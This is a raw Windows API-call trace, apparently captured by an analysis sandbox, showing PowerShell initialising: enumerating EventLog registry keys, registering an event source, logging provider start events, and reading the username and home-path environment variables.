	[0488.365] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x8, lpName=0x3f47b0, lpcchName=0x24d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.365] CoTaskMemFree (pv=0x3f47b0) 
	[0488.365] CoTaskMemFree (pv=0x0) 
	[0488.365] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x330) returned 0x0
	[0488.365] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x0) returned 0x2
	[0488.366] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x334) returned 0x0
	[0488.366] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x0) returned 0x2
	[0488.366] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x338) returned 0x0
	[0488.366] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x0) returned 0x2
	[0488.366] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x33c) returned 0x0
	[0488.366] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x0) returned 0x2
	[0488.366] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x340) returned 0x0
	[0488.366] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x0) returned 0x2
	[0488.366] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x344) returned 0x0
	[0488.367] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x0) returned 0x2
	[0488.367] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x348) returned 0x0
	[0488.367] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x0) returned 0x2
	[0488.367] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x34c) returned 0x0
	[0488.367] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x0) returned 0x2
	[0488.367] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x350) returned 0x0
	[0488.367] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x354) returned 0x0
	[0488.367] RegCloseKey (hKey=0x354) returned 0x0
	[0488.368] RegCloseKey (hKey=0x32c) returned 0x0
	[0488.368] RegCloseKey (hKey=0x350) returned 0x0
	[0488.369] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d208 | out: phkResult=0x24d208*=0x350) returned 0x0
	[0488.369] RegQueryInfoKeyW (in: hKey=0x350, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d17c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d178, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d17c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d178*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.369] CoTaskMemFree (pv=0x0) 
	[0488.369] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.370] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x0, lpName=0x3f47b0, lpcchName=0x24d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.370] CoTaskMemFree (pv=0x3f47b0) 
	[0488.370] CoTaskMemFree (pv=0x0) 
	[0488.370] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.370] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x1, lpName=0x3f47b0, lpcchName=0x24d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.370] CoTaskMemFree (pv=0x3f47b0) 
	[0488.370] CoTaskMemFree (pv=0x0) 
	[0488.370] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.370] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x2, lpName=0x3f47b0, lpcchName=0x24d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.370] CoTaskMemFree (pv=0x3f47b0) 
	[0488.370] CoTaskMemFree (pv=0x0) 
	[0488.370] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.370] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x3, lpName=0x3f47b0, lpcchName=0x24d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.370] CoTaskMemFree (pv=0x3f47b0) 
	[0488.370] CoTaskMemFree (pv=0x0) 
	[0488.371] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.371] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x4, lpName=0x3f47b0, lpcchName=0x24d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.371] CoTaskMemFree (pv=0x3f47b0) 
	[0488.371] CoTaskMemFree (pv=0x0) 
	[0488.371] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.371] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x5, lpName=0x3f47b0, lpcchName=0x24d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.371] CoTaskMemFree (pv=0x3f47b0) 
	[0488.371] CoTaskMemFree (pv=0x0) 
	[0488.371] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.371] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x6, lpName=0x3f47b0, lpcchName=0x24d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.371] CoTaskMemFree (pv=0x3f47b0) 
	[0488.371] CoTaskMemFree (pv=0x0) 
	[0488.371] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.371] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x7, lpName=0x3f47b0, lpcchName=0x24d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.371] CoTaskMemFree (pv=0x3f47b0) 
	[0488.371] CoTaskMemFree (pv=0x0) 
	[0488.371] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.372] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x8, lpName=0x3f47b0, lpcchName=0x24d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.372] CoTaskMemFree (pv=0x3f47b0) 
	[0488.372] CoTaskMemFree (pv=0x0) 
	[0488.372] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x32c) returned 0x0
	[0488.372] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x0) returned 0x2
	[0488.372] RegOpenKeyExW (in: hKey=0x350, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x354) returned 0x0
	[0488.372] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x0) returned 0x2
	[0488.372] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x358) returned 0x0
	[0488.372] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x0) returned 0x2
	[0488.372] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x35c) returned 0x0
	[0488.373] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x0) returned 0x2
	[0488.373] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x360) returned 0x0
	[0488.373] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x0) returned 0x2
	[0488.373] RegOpenKeyExW (in: hKey=0x350, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x364) returned 0x0
	[0488.373] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x0) returned 0x2
	[0488.373] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x368) returned 0x0
	[0488.373] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x0) returned 0x2
	[0488.373] RegOpenKeyExW (in: hKey=0x350, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x36c) returned 0x0
	[0488.373] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x0) returned 0x2
	[0488.374] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x370) returned 0x0
	[0488.374] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d268 | out: phkResult=0x24d268*=0x374) returned 0x0
	[0488.374] RegCloseKey (hKey=0x374) returned 0x0
	[0488.374] RegCloseKey (hKey=0x350) returned 0x0
	[0488.374] RegCloseKey (hKey=0x370) returned 0x0
	[0488.375] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1d8 | out: phkResult=0x24d1d8*=0x370) returned 0x0
	[0488.375] RegQueryInfoKeyW (in: hKey=0x370, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d14c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d148, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d14c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d148*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.375] CoTaskMemFree (pv=0x0) 
	[0488.375] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.375] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x0, lpName=0x3f47b0, lpcchName=0x24d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.375] CoTaskMemFree (pv=0x3f47b0) 
	[0488.376] CoTaskMemFree (pv=0x0) 
	[0488.376] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.376] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x1, lpName=0x3f47b0, lpcchName=0x24d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.376] CoTaskMemFree (pv=0x3f47b0) 
	[0488.376] CoTaskMemFree (pv=0x0) 
	[0488.376] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.376] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x2, lpName=0x3f47b0, lpcchName=0x24d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.376] CoTaskMemFree (pv=0x3f47b0) 
	[0488.376] CoTaskMemFree (pv=0x0) 
	[0488.376] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.376] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x3, lpName=0x3f47b0, lpcchName=0x24d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.376] CoTaskMemFree (pv=0x3f47b0) 
	[0488.376] CoTaskMemFree (pv=0x0) 
	[0488.376] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.376] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x4, lpName=0x3f47b0, lpcchName=0x24d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.376] CoTaskMemFree (pv=0x3f47b0) 
	[0489.344] CoTaskMemFree (pv=0x0) 
	[0489.344] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0489.344] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x5, lpName=0x3f47b0, lpcchName=0x24d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0489.344] CoTaskMemFree (pv=0x3f47b0) 
	[0489.344] CoTaskMemFree (pv=0x0) 
	[0489.344] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0489.344] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x6, lpName=0x3f47b0, lpcchName=0x24d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0489.344] CoTaskMemFree (pv=0x3f47b0) 
	[0489.344] CoTaskMemFree (pv=0x0) 
	[0489.345] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0489.345] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x7, lpName=0x3f47b0, lpcchName=0x24d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0489.345] CoTaskMemFree (pv=0x3f47b0) 
	[0489.345] CoTaskMemFree (pv=0x0) 
	[0489.345] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0489.345] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x8, lpName=0x3f47b0, lpcchName=0x24d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0489.345] CoTaskMemFree (pv=0x3f47b0) 
	[0489.345] CoTaskMemFree (pv=0x0) 
	[0489.345] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x350) returned 0x0
	[0489.345] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x0) returned 0x2
	[0489.345] RegOpenKeyExW (in: hKey=0x370, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x374) returned 0x0
	[0489.345] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x0) returned 0x2
	[0489.346] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x378) returned 0x0
	[0489.346] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x0) returned 0x2
	[0489.346] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x37c) returned 0x0
	[0489.346] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x0) returned 0x2
	[0489.346] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x380) returned 0x0
	[0489.346] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x0) returned 0x2
	[0489.346] RegOpenKeyExW (in: hKey=0x370, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x384) returned 0x0
	[0489.346] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x0) returned 0x2
	[0489.346] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x388) returned 0x0
	[0489.347] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x0) returned 0x2
	[0489.347] RegOpenKeyExW (in: hKey=0x370, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x38c) returned 0x0
	[0489.347] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x0) returned 0x2
	[0489.347] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x390) returned 0x0
	[0489.347] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x394) returned 0x0
	[0489.347] RegCloseKey (hKey=0x394) returned 0x0
	[0489.347] RegCloseKey (hKey=0x370) returned 0x0
	[0489.348] RegCloseKey (hKey=0x390) returned 0x0
	[0489.353] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1ba90008
	[0490.110] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fc6858*="WSMan", lpRawData=0x2fc65c8) returned 1
	[0490.112] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0490.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0490.112] CoTaskMemFree (pv=0x1b91f1c0) 
	[0490.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.115] CoTaskMemAlloc (cb=0x804) returned 0x1b92a760
	[0490.115] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b92a760, nSize=0x24d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d4c8) returned 0x1
	[0490.115] CoTaskMemFree (pv=0x1b92a760) 
	[0490.115] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0490.115] GetUserNameW (in: lpBuffer=0x3f47b0, pcbBuffer=0x24d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d508) returned 1
	[0490.115] CoTaskMemFree (pv=0x3f47b0) 
	[0490.116] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fcbd90*="Alias", lpRawData=0x2fcbb20) returned 1
	[0490.117] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0490.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0490.117] CoTaskMemFree (pv=0x1b91f1c0) 
	[0490.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.119] CoTaskMemAlloc (cb=0x804) returned 0x1b92a760
	[0490.119] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b92a760, nSize=0x24d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d4c8) returned 0x1
	[0490.120] CoTaskMemFree (pv=0x1b92a760) 
	[0490.120] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0490.120] GetUserNameW (in: lpBuffer=0x3f47b0, pcbBuffer=0x24d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d508) returned 1
	[0490.120] CoTaskMemFree (pv=0x3f47b0) 
	[0490.120] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fd1388*="Environment", lpRawData=0x2fd1118) returned 1
	[0490.122] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0490.122] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0490.122] CoTaskMemFree (pv=0x1b91f1c0) 
	[0490.123] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0490.123] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0490.123] CoTaskMemFree (pv=0x1b91f1c0) 
	[0490.123] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0490.123] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0490.123] CoTaskMemFree (pv=0x1b91f1c0) 
